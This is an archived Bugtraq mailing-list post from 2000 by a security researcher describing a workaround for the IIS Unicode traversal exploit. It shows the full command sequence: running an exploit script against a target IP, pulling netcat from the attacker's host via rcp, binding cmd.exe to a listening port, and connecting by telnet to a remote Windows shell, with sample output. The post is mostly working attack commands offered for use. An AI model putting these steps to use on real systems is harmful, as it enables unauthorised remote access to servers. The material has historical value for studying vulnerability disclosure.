[17336] in bugtraq
IIS Unicode
daemon@ATHENA.MIT.EDU (Roelof Temmingh)
Wed Oct 25 03:45:48 2000
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <Pine.BSF.4.21.0010250230530.1398-100000@wips.sensepost.com>
Date: Wed, 25 Oct 2000 02:54:58 +0200
Reply-To: Roelof Temmingh <roelof@SENSEPOST.COM>
From: Roelof Temmingh <roelof@SENSEPOST.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Bugtraq ID 1806,
http://www.securityfocus.com/vdb/bottom.html?vid=1806 applies:
I was having problems executing a command that contains a redirect (>) using
any of the IIS Unicode exploits (including my own exploits on security focus
;) ). If anyone can get a redirect working, please let me know. In order to get
some interesting tools on the victim, you would probably want to have the
victim to FTP to the attacker. Problem without redirect is that you cannot
build the FTP command file, and you are a bit stuck.
A workaround (example) (with a rsh running on attacker's host and the necessary
config in .rhosts):
> perl unicodexecute.pl 160.124.19.101:80 'rcp -b 160.124.19.98.roelof:/tmp/nc.exe nc.exe'
> perl unicodexecute.pl 160.124.19.101:80 'c:\inetpub\scripts\nc.exe -l -p 8888 -e cmd.exe'
> telnet 160.124.19.101 8888
Trying 160.124.19.101...
Connected to clickfeed.
Escape character is '^]'.
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.
C:\Inetpub\scripts>
Of course you need to allow port 514 to the inside of your net etc.
;)
Have fun,
Roelof.
PS: this is a bit of a rip off from www.hack.co.za - spawncmd.pl
------------------------------------------------------
Roelof W Temmingh SensePost IT security
roelof@sensepost.com +27 83 448 6996
http://www.sensepost.com
